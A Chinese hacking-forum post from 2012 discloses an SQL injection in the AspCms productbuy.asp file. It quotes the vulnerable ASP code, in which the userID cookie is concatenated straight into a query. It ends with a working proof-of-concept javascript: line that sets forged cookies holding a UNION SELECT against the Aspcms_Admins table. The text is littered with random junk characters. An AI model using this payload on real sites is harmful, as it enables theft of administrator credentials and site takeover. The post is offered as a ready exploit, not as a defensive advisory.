好久没上土司了,上来一看发现在删号名单内.....
/ c" r$ s' S0 o4 W# w* A+ l0 k! w8 o也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。- y& p9 n, ?5 ^: f5 D
废话不多说,看代码:4 @# S6 b/ e2 T% M' ~
! s/ P& n3 t) j! e( s3 j c. y- {" [* D<%7 e& x* J* }5 P
$ q; A' {3 m- U4 j: C' d/ R
if action = "buy" then
9 z, \6 `6 q* w
4 }. N0 K. q/ l7 P. P! g; b addOrder()9 Y: p2 K) p# P
" F+ U* u9 r) ]$ ?! ^2 T+ \8 C
else# ~9 g5 N2 z1 f; b) n
* U& v0 p: F) X# Z* v
echoContent()
: t* v ~. _- q8 v" ?/ z8 o4 M; A! X' Q3 F
end if) g4 E3 o6 U) G: q, k
/ P: P& H/ H; U8 j( ~ T9 \4 R# D/ ~ v% s
3 D- S$ N2 B$ k. D3 W: K……略过. i# B3 z' D0 ^* Z7 X
# x$ d3 a& g; S" h+ w% ^ I
/ U2 v6 u; q4 d& R$ @' z
6 ]5 S( `( Z: D: e9 o4 LSub echoContent()7 ]( }0 ~& h* \6 f
/ {' c) W |/ T dim id
$ _; c$ E7 m) t& x2 P6 Y
) B, u+ T+ a7 q& J' E0 G id=getForm("id","get")
5 M9 w( i- n8 v! Y: u6 w
2 y4 R9 d- l5 Q5 B) I) H( X
( A8 v p0 K4 [/ ^ A
: O: B1 v2 T! R; G5 Y/ \6 e if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 1 \0 {: z( q. u0 t+ D
# R/ J, x' ^2 z 2 w6 _# O$ _5 m W% v
+ J5 \0 B! h8 B* k3 [
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
) F, d. z8 K- a. S5 e' g3 n$ E7 ]7 Z( G$ D$ i
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct6 L" L! z) R$ d
9 o) o4 O* W4 N6 ` Dim templatePath,tempStr3 X! _* C7 `4 k) y5 I
" D- [( Y3 L9 \8 }+ r' P templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"/ T8 p* R, C8 C* Z, }) c; T
5 A7 L- G0 W+ j6 @7 k
4 d& y5 x( [/ N4 T
1 m" a: q" L! }9 g, {
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
5 n8 y6 n: P) {. P2 a1 a0 C$ H3 B8 m- T4 |
selectproduct=rsObj(0): y6 x8 J$ L/ m6 [$ p9 s& f
: z* G! \( Y% P% N, l& @ q0 z8 _
# _' K7 ~# O6 K0 {+ ]! n2 V
! F8 d; p9 b( F! \ Dim linkman,gender,phone,mobile,email,qq,address,postcode3 S# d* |# R( {' q# R, G
% Z, W* N( P3 i) N3 ?* s* }% {, q
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
* z, I3 Y Y a# X" h3 k# [6 k, }/ D6 H, ]
if rCookie("loginstatus")=1 then 4 ?. _% H0 J. U* T
@5 H J2 f& X7 v! f2 L# T
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")6 S [* |1 c: \& ^; i9 e
4 L' y% a" Q* b# ]7 J linkman=rsObj("truename")
$ N. k3 t# f' }+ n2 J7 K, x, [* ^1 l( d$ j* `
gender=rsObj("gender")
* O* L3 x/ a7 n+ S0 n
" r( |, {7 F3 Y' }( B& t" E: E phone=rsObj("phone")6 i5 Z! [( o, @
8 _9 N |$ `8 S/ c3 k+ F; g
mobile=rsObj("mobile")
. Y' ?' F& U% J. t1 w' Y: v
$ E2 M3 G# l1 f9 B email=rsObj("email")
- L k( [: G% g) K/ ]/ F( U% G6 f; Z( j, v: o1 r5 n1 H1 d
qq=rsObj("qq")
9 g2 k3 r; D; R8 p, H X. O6 A8 W4 D& X+ B
address=rsObj("address")
4 a: s" k$ W2 k( `/ L" f ]( R- }; _8 W+ ?& @) m
postcode=rsObj("postcode")
2 E$ R- B' r8 s" V; d* H8 _# X; y( X. M1 N- z
else
1 \4 l3 g8 p# e7 i O- L7 O! l8 h
* R" L5 {3 E! D2 J0 k+ _ gender=17 c: u# L6 u' }# @& f
/ b3 j' M& [# b- K end if
* J8 h0 I$ |- J5 A, |' R" }$ e7 l9 p& a
rsObj.close()" r1 b! l# M3 g" r
1 B6 m" j# g( s7 Q' D" o
. r( C5 |( `. j2 f; |/ ~. d6 ^1 @2 g! M9 S
with templateObj
) F4 ^) d, W3 k1 f7 ~: Y- _2 ~
# T/ ^$ U1 Z7 h& Z .content=loadFile(templatePath) & j, A9 g' _- w( n9 M5 F" X) o( h
* |9 G, T% q0 o# ~# |1 m6 O
.parseHtml()) _+ J( ]) k; g1 P1 i2 c' k7 o
( I E+ A, I* T* C- R4 K- s .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct). l' t* c- M4 L( `
6 D" O# `5 G3 R! {1 V; S/ }' g .content=replaceStr(.content,"[aspcms:linkman]",linkman)
, R* L( z$ f8 g/ e7 K; C8 G: ~0 j# r: @; F# A; K I: ?: X4 i
.content=replaceStr(.content,"[aspcms:gender]",gender) $ g, S G- ? a% h3 L
: n/ H: C4 O; ]3 O' e7 c$ t .content=replaceStr(.content,"[aspcms:phone]",phone)
7 ~9 p9 U% a' j$ m; f* D( v/ n& x$ r. D
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
& X! A* w3 I/ A3 a1 H
7 c8 ?& s- @4 M! K0 i3 M6 Q .content=replaceStr(.content,"[aspcms:email]",email) " x1 L4 j* e" t% `* K! c \* J# N/ E
8 Q) S, f3 O. \- |) Z/ G4 Q .content=replaceStr(.content,"[aspcms:qq]",qq) 9 F4 D4 D2 t _. M) A
: F( z# {- Q0 I5 I- Y
.content=replaceStr(.content,"[aspcms:address]",address) , C F! Y. [3 p9 U9 `9 D. v7 D8 P
3 i1 R, U* Y5 m% g .content=replaceStr(.content,"[aspcms:postcode]",postcode)
1 f( h" N, `" Q9 B' ]7 V! G
. T; k9 m- ]) G4 O) n7 P .parseCommon()
. |: \4 p" z$ o, p$ `- l
. v* w. ?; B: g$ F echo .content 7 v( g$ e8 u' \: a0 H
2 C6 s6 y4 |4 f+ a+ ]
end with
6 v8 X2 Y; k! e4 f. e1 X9 |: h3 m! S, Q. y/ s7 W t4 O! m1 v
set templateobj =nothing : terminateAllObjects
4 J' N& P8 v; ~' |
+ y: Q4 o* w3 s1 @# t3 K, \+ Z2 @End Sub7 X6 F7 j- H; P! g+ c2 C
漏洞很明显,没啥好说的
5 r% [+ Y0 w, }' x5 U d. [- `poc:
6 z, `. W+ C% D' \1 o4 K( q) S3 q6 {9 m- l, P3 c* A+ j+ e% V" a
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子" ~' G9 ^! z2 o, a- g
& C% E- B# ?6 t0 ?, ]# \ |
发表于 2012-12-27 08:35:05
收藏
支持
反对